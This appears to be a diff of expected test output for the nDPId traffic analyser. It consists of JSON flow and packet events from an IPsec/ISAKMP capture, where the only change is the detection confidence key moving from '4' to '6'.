-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946744635161,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28836,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":946744635161,"flow_last_seen":946747261671,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":28836,"flow_avg_l4_payload_len":480,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748116945,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946748252067,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946748252067,"pkt":"eJS0JASgYDjgxTWgCABFAANM6MpAAD8RYxnAqAJkbe27wzikEZQDOGeNAAAAANpOZUhee9vE4X9PRQEMKCsuICMIAAAAAQAAAywjAAMQsrXOsXYVW8iUlhIsUUvNjT\/voEQADww3FHRxo8Lh5XNDoNVmKGRxbykmB5j0XNFwzenOaAt3l01KgqVKbH5pkgNGhL7kplclqCyVu6i53noegjTJbis6int7lQLn21Xx9LRt5aPR38ts9B8PPBqP++xoTYB4p4zfDP022YuzS4P63bUv2ohk\/FItQHlJd0Fmu2NMTXpmgfgwx4cLEl2wojdOCV9i0OGHpCw+g39I2Tiea7iSlyCWe8tnIMVZovYpbDCgJDGw43rcluIrMbLLRtdUmdAGwzF3yMawpmK0gXt\/+zRMdKGnaBljPhx4\/\/ZvLQVEIeQAeSjocKro9zfFcz3zsKie0+tHpaDnsjH9jBk8ZPhRpRUxFqg8AQFXkkp7gRLmdQwmEhIzLpb1I1lIuvpvaO5UWMXQA7k8uQB\/mkiLG+YqXVkyN1Y0enHvmE\/A71PHs6bfiumAy42wqIXH2yvRiN3Ks0csnwHy1vrl2jjKACowTHaIWJijf7VdNvRI4ulE6Rm3KExWQEqvAivfqYx4SHovkfbyIsoNZxKN\/Fnw25ppLQ0NJsQjLYD3KcCXjM5zU1RpgZGH8fGvzodxvxDgr\/qn7IUY8kHt0ngSJDt7zq39MsFzb9ZFGDypbck+w8ML4t6RzybBt1l80+4+hBv+ZV3WqpCsLoUSW8W1IkDUtws6QQJDRV+SasL7QzLKX3UcoHTKTKfMqjMzlT\/JPKpVJFVzW3onn+XNdJ3TsN0KninOkmVi3pknAkieQCxfSzpcjbQuu3J9heIKLmuC7uQo1YPeFI\/7NP27zjElKu5qfQTekYBHfz5ucSpV2JfWki1rk2DeNVR\/k4a6BvNV+0Ihgin44j726m6Y3Jwr2bTP6ELhU3ruAU\/5su6dVhXjbQoOfojwjd0Ghb9P7CH6lJXh1wiy84wpC64Fw6mo5xAummAzZpoxIJQ2RJ\/8V0E8yMC6+tFlFq4bOyDlFJeMjPRwsKEE5h\/iwf2GPQ2prxGGfJgfQHtCEw6s52vUUiT7N4X3wlnFUNkta55O"} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748252067,"flow_last_seen":946748252067,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748252067,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946748252223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946748252223,"pkt":"YDjgxTWgeJS0JASgCABFAADsll0AAPcRP+Zt7bvDwKgCZBGUOKQA2ApBAAAAANpOZUhee9vE4X9PRQEMKCsuICMgAAAAAQAAAMwkAACwwtTY3LpsT\/qwmvDisdfuxNK9yYrpebO+rMZ5gosLrRPfV7l+EmjCwenOXlPnAJuTroZt2GWmHMwPx6R5Wj70Qr9DZKVTSqPq6YqJS5sGXfmFN\/1jExW+fCr7RKpVks1R0rYUvIXhcUMq0ZUYx\/gcQzqKd1Y5K58gnestiIbcfozWvwAaS\/ZalYwjttsUIr8A6e7tdKFyD5BgINSk\/rB0eTyeYdm7\/lsSjZrFmw=="} 00595{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946748252781,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946748252781,"pkt":"eJS0JASgYDjgxTWgCABFAACM6UxAAD8RZVfAqAJkbe27wzikEZQAeNdkAAAAANpOZUhee9vE4X9PRQEMKCsuICMIAAAAAgAAAGwwAABQbRlMTHkBUjUiFIJs0wUF7LPLrRl4iHhgYt7SBLhXlxpp\/nE4VODX3ETKtazVaSDnsVwjWda2BE7eb0FjKUfCaTvVEmiG7yYu+Hga6A=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":858,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":858,"pkt_l4_len":824,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAANMYHpAAD8R62vAqAJkbe27wTikEZQDOLCfAAAAAP914hnvOUFtU+t6DQP4cgkuICMIAAAAAQAAAywjAAMQJG6kBzuSbgmtHm3DmL2y\/nYa\/nQiHQr5ien9M4jGctznhQLh65BLJSOLQ1\/OoPd1hL8iWIXKH6OJRvz0lkxteLxEV4slgt\/iCr81DNXSos3Vxq3mBiUra3nmmCi+9ftz4RS3DQOfeyPbrgqPq0nKy0fupVsKJ7Zxz7gFDJisD4Zcguyx2F0uGpkxEjzEZRAMnVm+iKOQNnv88Qhcsr8zj1\/SiHbHUbDEIsI1cdidANE5eorr8On\/dRHr19qai9eAN80h\/tejzikg8CsBp\/WxAroxOc5xtdJoITbwuV5cwAnWXc89gupef8s2ynw8sCxDHSmBTElq0MdpJEEWrBWZMFFt+QW5iTsF7lc1mTr2KlVatW\/frNLWT9TBxJyVROT\/qlIvRoCO28Ifm+a4NKxL2oF+cBaN1oJUIF2+NgyZGJBBzt1xNvANeS6fhmkzrterXpxuFxPXt9t4iBznp0ucpzCaXMVtomPODVrpNrBZcFISOjEcgBnHU\/f\/1qy8q\/Ygr9o86z1558Bta6Ws5mzP5vEe6fS4CXWAKUd0fycJnrqwdCur7F6A25xKjkD9VdbCoYOOfJ3svCNmQ249FAOF9sVu85qHYK7VRJunX9bja\/s9Oqb1dkTDuJeR7NWVrF\/6MKIlcjB8xbefJAKk2U\/6YfBr1iqqLzlvn1JM2qaRtwWeAO7iNi8CwbTnhKU0Dkv8lZ3+t+odHhY8JE0GOT\/XrB2P60m\/b5r60qDOgSL83oxI3pnwb\/th9Y\/ZBeQOT7RRqa5xsS\/7LRf54dHEKHvyYFxB1gidL+iEiBYnmKXKiJ93OcckD3zm1T2veg+eSK5jBviAPJilRAu\/9WSrqVLfCh41n+hz5dLo6RVdNMhRh0EaKuniXpcsmIC6OML\/YM3L+cTys\/1ehMTZJ5H7W4D6aDlC48W5lD6y8F+FbS1WvOYVXYyONGexnP1DJD6sMvWK5Q52bNW1EriIYf6I81yfVkjESiMA5ZA+Eq4pQUgDA5GXT7KTHfVx8STidRTLi\/eORWO4h6b0v5dA8dkn"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":816,"flow_max_l4_payload_len":816,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":816,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":946748266345,"pkt":"YDjgxTWgeJS0JASgCABFAADsWI4AAPcRfbdt7bvBwKgCZBGUOKQA2HH\/AAAAAP914hnvOUFtU+t6DQP4cgkuICMgAAAAAQAAAMwkAACwfOu85cuZCUbVuq5wm542UXnESUHvBRNjBca38ma3hqliZsy+G\/\/n62MBVQNpBmYJoZnF09Qmr1Z9AMg5tlsZQg+4xCpY4ssYThUAi8+wYicxcx11cAacOuAlsFrAIcFYRZV3T7KvT4B6PT3kvl+mZX8NHattCE7zkX+uEGW41fimmWlx+QR1iVB7GlSVyjJxXMb2eHWzkhBMoZHUk6vSm+Uwhf0kF6eDJ160Jg=="} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAACMYKRAAD8R7gHAqAJkbe27wTikEZQAeHXnAAAAAP914hnvOUFtU+t6DQP4cgkuICMIAAAAAgAAAGwwAABQsyybA\/pO5Y0NejAqULLQtpl3j4jbOqkLYKooS0R9AlfONoTAuJ23Z4\/\/Qg3tTx3Q2UzJE2YfJf0QtP9cSb3bPqnZCPECcDF2jFD5Kg=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":818,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":818,"pkt_l4_len":784,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAAMk6LJAAD8RY1nAqAJkbe27wykEAfQDELOl2k5lSF5728QAAAAAAAAAACEgIggAAAAAAAADCCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEWBsQ9kaLxzTkrabWSYqvv46zeeAB2r4t6eafrhND2UHjPer+76pSUiMJgZNfJbyU7Kq1544uJ9m882aGdmjcnapva+LG8b1xvmdrWPkwyhcAet3Kuf79u6LZBnTMWiJqA2z2dlH3ExsLwUYVzB\/9O+guLX64aMD4yr43miIqE+KQAAJNbeYndsxpRteQJq7FlIdurWEhJnYXNbqT1WPC1KmuqpKQAAHAAAQARb6C2wDaopl+DFj+XmAlY4N5j6CwAAABwAAEAFAoYE8OQWRt3BYjiQBZCwYMlfBHc="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":776,"flow_max_l4_payload_len":776,"flow_tot_l4_payload_len":776,"flow_avg_l4_payload_len":776,"midstream":0,"thread_ts_msec":946748266345,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":946748266345,"pkt":"YDjgxTWgeJS0JASgCABFAABQlSsAAPcRQbRt7bvDwKgCZAH0KQQAPKW92k5lSF5728QAAAAAAAAAACkgIiAAAAAAAAAANAAAABgAAEAGAAB8LnJU3X9N35FnuMbYiA=="} 01512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946748266345,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"thread_ts_msec":946748266345,"pkt":"eJS0JASgYDjgxTWgCABFAAM86MBAAD8RYzPAqAJkbe27wykEAfQDKA2m2k5lSF5728QAAAAAAAAAACkgIggAAAAAAAADICEAABgAAEAGAAB8LnJU3X9N35FnuMbYiCIAAggCAABQAQEACAMAAAwBAAAMgA4AgAMAAAwBAAAMgA4BAAMAAAgDAAACAwAACAMAAAwDAAAIAgAAAgMAAAgCAAAFAwAACAQAAAIAAAAIBAAABQAAAbQCAQAuAwAACAEAAAMDAAAMAQAADIAOAIADAAAMAQAADIAOAMADAAAMAQAADIAOAQADAAAMAQAADYAOAIADAAAMAQAADYAOAMADAAAMAQAADYAOAQADAAAMAQAAEoAOAIADAAAMAQAAEoAOAMADAAAMAQAAEoAOAQADAAAMAQAAE4AOAIADAAAMAQAAE4AOAMADAAAMAQAAE4AOAQADAAAMAQAAFIAOAIADAAAMAQAAFIAOAMADAAAMAQAAFIAOAQADAAAIAwAAAQMAAAgDAAACAwAACAMAAAUDAAAIAwAADAMAAAgDAAANAwAACAMAAA4DAAAIAgAAAQMAAAgCAAACAwAACAIAAAQDAAAIAgAABQMAAAgCAAAGAwAACAIAAAcDAAAIBAAAAgMAAAgEAAAFAwAACAQAAA4DAAAIBAAADwMAAAgEAAAQAwAACAQAABIDAAAIBAAAEwMAAAgEAAAUAwAACAQAABUDAAAIBAAAFgMAAAgEAAAXAwAACAQAABgDAAAIBAAAGQMAAAgEAAAaAwAACAQAABsDAAAIBAAAHAMAAAgEAAAdAAAACAQAAB4oAACIAAIAAEWBsQ9kaLxzTkrabWSYqvv46zeeAB2r4t6eafrhND2UHjPer+76pSUiMJgZNfJbyU7Kq1544uJ9m882aGdmjcnapva+LG8b1xvmdrWPkwyhcAet3Kuf79u6LZBnTMWiJqA2z2dlH3ExsLwUYVzB\/9O+guLX64aMD4yr43miIqE+KQAAJNbeYndsxpRteQJq7FlIdurWEhJnYXNbqT1WPC1KmuqpKQAAHAAAQARb6C2wDaopl+DFj+XmAlY4N5j6CwAAABwAAEAFAoYE8OQWRt3BYjiQBZCwYMlfBHc="} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748298684,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946747261671,"flow_last_seen":946748116945,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748298684,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 00566{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":127,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","packets-captured":127,"packets-processed":126,"total-skipped-flows":0,"total-l4-payload-len":59936,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":6,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":946748870137} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946748252067,"flow_last_seen":946748871542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} -00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":946748266345,"flow_last_seen":946748870202,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":5748,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":10500,"dst_port":500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946748266345,"flow_last_seen":946748266345,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":6928,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.193","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} +00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":145,"source":"ipsec_isakmp_esp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":946748252067,"flow_last_seen":946748871542,"flow_idle_time":200000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1332,"flow_tot_l4_payload_len":13776,"flow_avg_l4_payload_len":475,"midstream":0,"thread_ts_msec":946748871542,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"109.237.187.195","src_port":14500,"dst_port":4500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IPSec","breed":"Safe","category":"VPN"}} 